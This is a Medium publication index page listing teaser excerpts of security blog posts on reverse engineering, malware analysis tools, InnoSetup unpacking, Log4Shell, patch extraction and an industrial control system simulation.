Published in SecurityBreak·PinnedMember-onlySecurity InfographicsI often do infographics to share security concepts or best practices. This page will list the different files. I will update it periodically so stay tuned by following me on Twitter or Medium. If you like these infographics, you can support me on BuyMeACoffee. Thanks! :) Consider becoming a Medium…Cybersecurtiy3 min read
Published in SecurityBreak·Jun 13[Reverse Engineering Tips] — IDA Pro Shortcut Cheat SheetThis is a short post to keep a track of the IDA shortcut cheat sheet available here. Happy reversing! :)Reverse Engineering1 min read[Reverse Engineering Tips] — IDA Pro Shortcut Cheat SheetThis is a short post to keep a track of the IDA shortcut cheat sheet available here. Happy reversing! :)----
Published in SecurityBreak·Jun 8Member-only10 Python Libraries for Malware Analysis and Reverse EngineeringWith code example! — It is no secret that in Cybersecurity, Python is probably one of the most versatile languages. It can help you create automation, small snippets, and an even bigger app. Even if you don’t like to code, at some point in your career in cybersecurity, you will find Python useful. I…Python6 min read
Published in SecurityBreak·May 10External ReferencesThis page is used to keep a track of my external work, including blogs, research, conferences, and media interview. Research Blogs Title: Using Python to unearth a goldmine of threat intelligence from leaked chat logs Date: June, 2022 URL: Using Python to unearth a goldmine of threat intelligence from leaked chat logs — Microsoft…Cybersecurity5 min read
Published in SecurityBreak·Mar 15[Reverse Engineering Tips] — Unpacking InnoSetupTo deliver an application, developers can use Windows installers. Windows installers are software components used for installing, maintaining, and removing a program. Windows installer can be used: To bundle a software with dependency dll or other software, To add additional commands during the installation process, Load specific configuration required by…Malware Analysis3 min read
Published in SecurityBreak·Feb 21My Top Books to Learn Malware Analysis and Reverse EngineeringI often get messages from people wanting to learn more about reverse engineering and malware. I always refer to the same books and I though it might be a good idea to share my best selection in this blog so that I can easily link to this page. I mostly…Malware Analysis6 min read
Published in SecurityBreak·Dec 21, 2021Log4Shell VisualizationThe Log4Shell (CVE-2021–44228) is a zero-day vulnerability in Log4j a Java logging framework, which has been released in December 2021. This vulnerability allows a remote code execution. It is estimated that the exploit affects hundreds of millions of devices and is quite simple to execute. The vulnerability takes advantage of…Log 4 Shell2 min read
Published in SecurityBreak·Dec 10, 2021[Reverse Engineering Tips] — Extracting MSU fileTo understand a vulnerability, it is sometimes useful to study the patch and compare it to see what has changed. On the Windows environment, patches are distributed through the update process in a Microsoft Standalone Update (MSU) file. In this RE tips, we are going to see how we can…Reverse Engineering2 min read
Published in SecurityBreak·Nov 26, 2021Member-only3D Printing Industrial Control System SimulationThis article is a repost from the McAfee website. I wrote this during my time at McAfee Labs in the Advanced Threat Research team. It is an industrial simulation with Modbus and a 3D printed industrial system. The original paper can be downloaded here: Industrial Control System (ICS) Simulation (mcafee.com).Makerlab8 min read
Published in SecurityBreak·Nov 25, 2021[Reverse Engineering Tips] — EnumeratorsWhen doing reverse engineering, it is important to understand the data structures that can be used by a program. Being able to reconstruct these data structures during disassembling will be very useful during your analysis and improve the understanding of the program. In this RE tips, I will explain a…Reverse Engineering4 min read